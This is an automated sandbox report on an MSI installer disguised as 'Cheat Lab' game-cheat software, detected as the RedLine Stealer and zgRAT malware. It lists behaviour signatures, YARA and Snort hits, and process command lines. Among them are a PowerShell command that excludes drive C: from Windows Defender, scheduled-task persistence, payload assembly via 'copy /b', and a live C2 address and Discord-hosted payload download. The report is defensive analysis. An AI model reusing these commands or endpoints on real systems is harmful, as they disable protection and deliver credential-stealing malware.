Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Cheat.Lab.2.7.2.msi

Overview

General Information

Sample name:Cheat.Lab.2.7.2.msi
Analysis ID:1374044
MD5:9014acfca65fca4bdf8b5f561c4a1783
SHA1:c8fcdefb8ba4f700801fc0e97811661fa972de30
SHA256:efea578cdac3d52601d43b6c4570d94e8fcbdd701573b33612551050e8246cd2
Tags:msi
Infos:

Detection

RedLine, zgRAT
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected RedLine Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Contains functionality to register a low level keyboard hook
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Drops large PE files
Found API chain indicative of debugger detection
Found API chain indicative of sandbox detection
Injects a PE file into a foreign processes
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file does not import any functions
PE file overlay found
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 6428 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Cheat.Lab.2.7.2.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 6524 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6128 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 30FEA9F9E3926AA1391EB6E446524DF5 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • compiler.exe (PID: 7808 cmdline: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\config MD5: E1985F2668B7617E122FE727315B6D07)
    • msiexec.exe (PID: 4856 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F28D3D46A9F6C7BEC118E0AE5C649DD3 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • powershell.exe (PID: 5084 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss87C.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi86A.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr86B.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr86C.txt" -propSep " :<->: " -testPrefix "_testValue." MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7256 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • msiexec.exe (PID: 7672 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding AF5482846545A3FBF6C3EBE62A323063 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • compiler.exe (PID: 7720 cmdline: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\config MD5: E1985F2668B7617E122FE727315B6D07)
    • powershell.exe (PID: 8144 cmdline: powershell -Command "Register-ScheduledTask -TaskName 'Y29ubmVjdDc0MQ==' -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe') -Trigger (New-ScheduledTaskTrigger -At (Get-Date).AddMinutes(1) -Once) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable) -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • connect.exe (PID: 7304 cmdline: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe MD5: B9DD622108F62A2288DEB12C8A7D85BA)
    • conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3120 cmdline: "C:\Windows\System32\cmd.exe" /k cmd < Roommates & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1188 cmdline: cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • tasklist.exe (PID: 6108 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 7580 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 7032 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 7184 cmdline: findstr /I "wrsa.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 7252 cmdline: cmd /c mkdir 28945 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 6536 cmdline: cmd /c copy /b Dns + Pontiac + Milfhunter + Ruling + Supervisor 28945\Carbon.pif MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 7668 cmdline: cmd /c copy /b Entered + Conferences 28945\w MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Carbon.pif (PID: 2316 cmdline: 28945\Carbon.pif 28945\w MD5: 848164D084384C49937F99D5B894253E)
          • jsc.exe (PID: 7848 cmdline: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)
            • qemu-ga.exe (PID: 6560 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe" MD5: A5CE3ABA68BDB438E98B1D0C70A3D95C)
        • PING.EXE (PID: 180 cmdline: ping -n 5 localhost MD5: B3624DD758CCECF93A1226CEF252CA12)
  • qemu-ga.exe (PID: 2148 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe" MD5: A5CE3ABA68BDB438E98B1D0C70A3D95C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000001D.00000003.2893690929.00000000039AA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        0000001D.00000003.2894225231.00000000039A9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          0000001D.00000003.2894002689.0000000003959000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            0000001D.00000003.2951972819.00000000038AC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              0000001D.00000003.2894424466.00000000039FB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                Click to see the 14 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                29.3.Carbon.pif.39a94e8.1.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                  29.3.Carbon.pif.39a94e8.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    29.3.Carbon.pif.39a94e8.1.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
                    • 0x331a5:$s1: file:///
                    • 0x33101:$s2: {11111-22222-10009-11112}
                    • 0x33135:$s3: {11111-22222-50001-00000}
                    • 0x30d07:$s4: get_Module
                    • 0x2cd5a:$s5: Reverse
                    • 0x2d506:$s6: BlockCopy
                    • 0x2cd42:$s7: ReadByte
                    • 0x331b7:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
                    29.3.Carbon.pif.39a94e8.5.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                      29.3.Carbon.pif.39a94e8.5.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        Click to see the 40 entries

                        Sigma Signatures

                        No Sigma rule has matched

                        Snort Signatures

                        Timestamp:192.168.2.445.15.156.18649741299752046045 01/12/24-23:14:10.418901
                        SID:2046045
                        Source Port:49741
                        Destination Port:29975
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:45.15.156.186192.168.2.429975497412046056 01/12/24-23:14:10.955529
                        SID:2046056
                        Source Port:29975
                        Destination Port:49741
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for URL or domain
                        Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab IncJump to behavior
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab Inc\Cheat LabJump to behavior
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab Inc\Cheat Lab\configJump to behavior
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeJump to behavior
                        Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49739 version: TLS 1.2
                        Source: Binary string: Z:\7zsfxmm-51139022f6d790da60884077b63b2f265052be0b\Output\Win32\7ZSfxMod.pdb source: connect.exe, 00000010.00000000.2470216171.0000000000426000.00000002.00000001.01000000.00000009.sdmp, connect.exe, 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                        Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeFile opened: c:
                        Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADC412C FindFirstFileExW,11_2_00007FF7BADC412C
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_00404399 FindFirstFileW,FindClose,SetLastError,CompareFileTime,16_2_00404399
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_00403C8F FindFirstFileW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,16_2_00403C8F
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_00403DA4 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,16_2_00403DA4
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0095E1AC GetFileAttributesW,FindFirstFileW,FindClose,29_2_0095E1AC
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0095D65B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,29_2_0095D65B
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0095D98E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,29_2_0095D98E
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0096A29A FindFirstFileW,Sleep,FindNextFileW,FindClose,29_2_0096A29A
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00966406 FindFirstFileW,FindNextFileW,FindClose,29_2_00966406
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_009670FE FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,29_2_009670FE
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0096705D FindFirstFileW,FindClose,29_2_0096705D
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00969DB1 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,29_2_00969DB1
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00969F0C SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,29_2_00969F0C
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pontiac
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Dns
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\

                        Networking

                        barindex
                        Snort IDS alert for network traffic
                        Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.4:49741 -> 45.15.156.186:29975
                        Source: TrafficSnort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 45.15.156.186:29975 -> 192.168.2.4:49741
                        Uses ping.exe to check the status of other devices and networks
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
                        Source: global trafficTCP traffic: 192.168.2.4:49741 -> 45.15.156.186:29975
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 213.248.43.48
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0096D5B3 InternetReadFile,SetEvent,GetLastError,SetEvent,29_2_0096D5B3
                        Source: global trafficHTTP traffic detected: GET /attachments/1194585859404599367/1194585905420320788/2 HTTP/1.1User-Agent: WinterCache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-AliveCookie: __cf_bm=NQ8hsNROJ4ECPUpzUwnJbG9uTPemeuU4i_wUYe2S75I-1705097558-1-AePzRORzeAr0iGC0qs1nWkncA+Psk0Y78fhnqrbDbP9Mw6fKoc9CI0A1E5NudBf115BY9/I6p8WSeSfkX3sogw4=; _cfuvid=Gm5WzVXIL6HX9Y_BYTeLwclnnr06fyZHUxgDMI2R4MA-1705097558055-0-604800000
                        Source: global trafficHTTP traffic detected: GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1Content-Type: application/jsonUser-Agent: WinterHost: ip-api.comCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /attachments/1194585859404599367/1194585905420320788/2 HTTP/1.1Content-Type: application/jsonUser-Agent: WinterHost: cdn.discordapp.comCache-Control: no-cache
                        Source: unknownDNS traffic detected: queries for: ip-api.com
                        Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                        Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                        Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                        Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                        Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                        Source: powershell.exe, 00000004.00000002.1857206800.0000022C513C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808676606.0000022C42C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1857206800.0000022C5128F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1750185508.00000203DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2542608949.0000022F43D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                        Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                        Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                        Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                        Source: connect.exe, 00000010.00000003.2498819056.0000000002800000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globign.com/rootr306
                        Source: powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000006.00000002.1734682756.00000203CD708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: powershell.exe, 00000004.00000002.1808676606.0000022C41211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1734682756.00000203CD4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2417024179.0000022F33CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000006.00000002.1734682756.00000203CD708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                        Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                        Source: powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmp, Carbon.pif, 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
                        Source: powershell.exe, 0000000E.00000002.2557762473.0000022F4BFB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                        Source: powershell.exe, 0000000E.00000002.2561242498.0000022F4C092000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                        Source: powershell.exe, 00000004.00000002.1808676606.0000022C41211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1734682756.00000203CD4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2417024179.0000022F33CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
